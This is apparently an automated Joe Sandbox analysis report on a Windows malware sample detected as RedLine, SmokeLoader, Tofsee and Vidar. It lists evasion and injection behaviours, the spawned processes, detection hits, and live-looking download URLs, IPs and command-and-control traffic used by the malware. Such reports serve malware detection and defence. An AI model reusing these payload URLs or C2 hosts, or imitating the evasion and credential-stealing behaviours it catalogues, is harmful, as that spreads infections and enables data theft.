Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 9ro85QVN0F.exe

Overview

General Information

Sample Name:9ro85QVN0F.exe
Analysis ID:553220
MD5:4e806c42b23b043fa7409d108eecaadb
SHA1:39d29853690f371fb690d427d34eace3946b6553
SHA256:847fd5a4cae442afc596f09b8a8f2de13bc85356dcd8b897a3b4a89081f5046f
Tags:CoinMinerexe
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 9ro85QVN0F.exe (PID: 6156 cmdline: "C:\Users\user\Desktop\9ro85QVN0F.exe" MD5: 4E806C42B23B043FA7409D108EECAADB)
    • 9ro85QVN0F.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\9ro85QVN0F.exe" MD5: 4E806C42B23B043FA7409D108EECAADB)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 411E.exe (PID: 4256 cmdline: C:\Users\user\AppData\Local\Temp\411E.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 53DC.exe (PID: 1740 cmdline: C:\Users\user\AppData\Local\Temp\53DC.exe MD5: 4E806C42B23B043FA7409D108EECAADB)
          • 53DC.exe (PID: 6976 cmdline: C:\Users\user\AppData\Local\Temp\53DC.exe MD5: 4E806C42B23B043FA7409D108EECAADB)
        • E6C4.exe (PID: 6924 cmdline: C:\Users\user\AppData\Local\Temp\E6C4.exe MD5: C94FBEF580C7CD0BA874360D0B997F22)
        • F4CF.exe (PID: 6380 cmdline: C:\Users\user\AppData\Local\Temp\F4CF.exe MD5: 50BADD524B2E3FAF0FF050DD5BE8A584)
          • cmd.exe (PID: 6228 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\jdijwvkg\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5092 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • FD6B.exe (PID: 6972 cmdline: C:\Users\user\AppData\Local\Temp\FD6B.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • FD6B.exe (PID: 5976 cmdline: C:\Users\user\AppData\Local\Temp\FD6B.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • wuapihost.exe (PID: 6700 cmdline: C:\Windows\System32\wuapihost.exe -Embedding MD5: 85C9C161B102A164EC09A23CACDDD09E)
  • svchost.exe (PID: 2224 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6596 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6580 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4776 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5388 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5020 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5224 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6956 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • iscgwer (PID: 6784 cmdline: C:\Users\user\AppData\Roaming\iscgwer MD5: 4E806C42B23B043FA7409D108EECAADB)
    • iscgwer (PID: 6780 cmdline: C:\Users\user\AppData\Roaming\iscgwer MD5: 4E806C42B23B043FA7409D108EECAADB)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000019.00000002.458534378.0000000000650000.00000040.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
      00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000018.00000002.406836326.0000000000582000.00000004.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000000.326990095.0000000004DE1000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            17.0.iscgwer.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              17.0.iscgwer.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                22.0.53DC.exe.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  22.0.53DC.exe.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    17.0.iscgwer.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 18 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\F4CF.exe, ParentImage: C:\Users\user\AppData\Local\Temp\F4CF.exe, ParentProcessId: 6380, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\bzxmernq.exe" C:\Windows\SysWOW64\jdijwvkg\, ProcessId: 5092

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeAvira URL Cloud: Label: malware
                      Source: http://81.163.30.181/2.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exeAvira URL Cloud: Label: malware
                      Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                      Source: http://81.163.30.181/1.exeAvira URL Cloud: Label: malware
                      Source: http://privacy-tools-for-you-780.com/downloads/toolspab3.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/7729_1642101604_1835.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                      Source: http://81.163.30.181/6236.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                      Source: C:\Users\user\AppData\Local\Temp\bzxmernq.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 9ro85QVN0F.exeVirustotal: Detection: 37%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exeVirustotal: Detection: 12%Perma Link
                      Source: http://data-host-coin-8.com/files/8474_1641976243_3082.exeVirustotal: Detection: 16%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\433C.exeMetadefender: Detection: 34%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\433C.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\AppData\Local\Temp\53A8.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeReversingLabs: Detection: 46%
                      Source: C:\Users\user\AppData\Local\Temp\656C.exeReversingLabs: Detection: 27%
                      Source: C:\Users\user\AppData\Local\Temp\D54.exeMetadefender: Detection: 29%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\D54.exeReversingLabs: Detection: 81%
                      Machine Learning detection for sampleShow sources
                      Source: 9ro85QVN0F.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\D54.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\iscgwerJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\656C.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\53A8.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\14F6.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\FE11.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\433C.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\27E3.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\7480.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\bzxmernq.exeJoe Sandbox ML: detected
                      Source: 24.3.E6C4.exe.680000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 25.2.F4CF.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 25.3.F4CF.exe.780000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 25.2.F4CF.exe.650e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 24.2.E6C4.exe.660e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00407190 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006676C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00664A80 CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00667760 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006673E0 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006679F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Bitcoin Miner:

                      barindex
                      Found strings related to Crypto-MiningShow sources
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmpString found in binary or memory: XMRig 6.2.2dz\AppData\Roaming\Sysfiles\Driver.exe

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeUnpacked PE file: 24.2.E6C4.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exeUnpacked PE file: 25.2.F4CF.exe.400000.0.unpack
                      Source: 9ro85QVN0F.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\411E.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.3:49874 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49876 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49918 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49924 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49933 version: TLS 1.2
                      Source: Binary string: C:\beritu100-kif-hi.pdb source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr
                      Source: Binary string: C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb source: FE11.exe.11.dr, 433C.exe.11.dr
                      Source: Binary string: @RC:\jadawac53 buxabalafubiro.pdbh source: D54.exe.11.dr
                      Source: Binary string: C:\wufiruy\zoji_batodetumoz97\toboyese.pdb source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
                      Source: Binary string: _TC:\wufiruy\zoji_batodetumoz97\toboyese.pdbh source: E6C4.exe, 00000018.00000000.402465553.0000000000401000.00000020.00020000.sdmp, E6C4.exe.11.dr
                      Source: Binary string: fHSC:\kaya\ginonohu.pdbh source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
                      Source: Binary string: \C:\coduluvi\vebazomimohey20-dubelat-cudecufoc 51\muzavibow63 r.pdb source: FE11.exe.11.dr, 433C.exe.11.dr
                      Source: Binary string: C:\beritu100-kif-hi.pdbh source: F4CF.exe, 00000019.00000000.409125786.0000000000401000.00000020.00020000.sdmp, F4CF.exe.11.dr, bzxmernq.exe.25.dr
                      Source: Binary string: C:\jadawac53 buxabalafubiro.pdb source: D54.exe.11.dr
                      Source: Binary string: C:\kaya\ginonohu.pdb source: 9ro85QVN0F.exe, iscgwer.11.dr, 53DC.exe.11.dr
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 411E.exe, 00000013.00000000.399120089.0000000000413000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.385802310.0000000000413000.00000002.00020000.sdmp, 411E.exe.11.dr
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exeCode function: 0_2_00419AC1 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00668A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006612E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_006614D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00666090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00669930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00669BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exeCode function: 24_2_00669D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.3:49889 -> 185.215.113.35:80
                      Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49888 -> 185.215.113.35:80
                      Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49895 -> 81.163.30.181:80
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49907 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49920 -> 81.163.30.181:80
                      Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.3:49921 -> 81.163.30.181:80
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49930 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49930 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49907 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /11.msi HTTP/1.1Host: 81.163.30.181Accept: */*
                      Source: global trafficHTTP traffic detected: GET /2.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                      Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                      Source: global trafficHTTP traffic detected: GET /2.exe HTTP/1.1Host: 81.163.30.181Accept: */*
